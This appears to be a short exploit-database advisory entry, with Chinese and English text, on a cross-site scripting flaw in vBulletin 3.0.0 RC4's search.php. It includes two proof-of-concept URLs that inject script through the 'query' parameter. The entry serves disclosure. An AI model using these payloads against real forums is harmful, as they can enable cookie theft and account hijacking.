https://www.exploit-db.com/exploits/23691
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-555

JelsoftvBulletin3.0.0RC4版本存在跨站脚本（XSS）漏洞。远程攻击者可以借助query参数注入任意web脚本或HTML。

source: http://www.securityfocus.com/bid/9656/info

It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks.

http://www.example.com/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>

http://www.example.com/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>

来源:XF
名称:vbulletin-search-xss(15208)
链接:http://xforce.iss.net/xforce/xfdb/15208
来源:BID
名称:9656
链接:http://www.securityfocus.com/bid/9656
来源:BUGTRAQ
名称:20040213vBulletinPHPForumVersion
链接:http://www.securityfocus.com/archive/1/353869